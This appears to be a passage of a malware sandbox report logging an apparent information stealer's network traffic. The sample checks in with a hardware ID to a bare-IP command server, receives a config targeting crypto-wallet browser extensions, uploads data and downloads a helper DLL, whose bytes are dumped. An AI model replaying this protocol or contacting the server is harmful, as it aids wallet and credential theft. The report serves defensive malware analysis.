2024-09-25 18:49:19 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-25 18:49:19 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-25 18:49:19 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:21 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 18:49:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:22 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJEGDAKEHJECAKEGDHJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:22 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 46 39 30 39 39 43 34 46 32 31 42 31 34 31 30 32 37 37 36 31 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 62 66 35 65 34 33 31 38 36 39 36 34 33 61 32 61 63 33 39 37 64 32 64 63 30 64 36 38 37 66 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 2d 2d 0d Data Ascii: ------GIJEGDAKEHJECAKEGDHJContent-Disposition: form-data; name="hwid"2F9099C4F21B1410277619-a33c7340-61ca------GIJEGDAKEHJECAKEGDHJContent-Disposition: form-data; name="build_id"9bf5e431869643a2ac397d2dc0d687fb------GIJEGDAKEHJECAKEGDHJ--
2024-09-25 18:49:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 18:49:23 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 34 34 32 66 31 34 63 33 62 63 65 63 34 31 63 64 33 36 64 37 65 34 64 66 34 38 63 35 64 31 37 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|d442f14c3bcec41cd36d7e4df48c5d17\|1\|1\|1\|0\|0\|50000\|10

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:25 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGHJDBFIIDGDHIJDBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:25 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 34 34 32 66 31 34 63 33 62 63 65 63 34 31 63 64 33 36 64 37 65 34 64 66 34 38 63 35 64 31 37 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 62 66 35 65 34 33 31 38 36 39 36 34 33 61 32 61 63 33 39 37 64 32 64 63 30 64 36 38 37 66 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="token"d442f14c3bcec41cd36d7e4df48c5d17------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="build_id"9bf5e431869643a2ac397d2dc0d687fb------FHCGHJDBFIIDGDHIJDBGCont
2024-09-25 18:49:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 18:49:26 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:28 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 5869 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:28 UTC	5869	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 34 34 32 66 31 34 63 33 62 63 65 63 34 31 63 64 33 36 64 37 65 34 64 66 34 38 63 35 64 31 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 62 66 35 65 34 33 31 38 36 39 36 34 33 61 32 61 63 33 39 37 64 32 64 63 30 64 36 38 37 66 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="token"d442f14c3bcec41cd36d7e4df48c5d17------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="build_id"9bf5e431869643a2ac397d2dc0d687fb------JDBGHIIDAECBFIDHIIDGCont
2024-09-25 18:49:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 18:49:29 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:29 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:29 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:29 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Wednesday, 25-Sep-2024 18:49:29 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 18:49:29 UTC	16120	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-25 18:49:29 UTC	16384	IN	Data Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-25 18:49:30 UTC	16384	IN	Data Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
2024-09-25 18:49:30 UTC	16384	IN	Data Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-25 18:49:30 UTC	16384	IN	Data Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-25 18:49:30 UTC	16384	IN	Data Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-25 18:49:30 UTC	16384	IN	Data Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: $td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-25 18:49:30 UTC	16384	IN	Data Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-25 18:49:30 UTC	16384	IN	Data Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-25 18:49:30 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$
2024-09-25 18:49:31 UTC	16384	IN	DELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count() FROM %Q.'%q_%s'tokencharsseparatorsL N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED] r:Y<\|=>MbP?\|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3\|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED] i" i"$i"0i"8i"Di"Pi"\i"hi" xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED] 9/I?hKd?81UH!G?#$0\|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1\|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED] !5ACPRSWYlm pr )Y"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

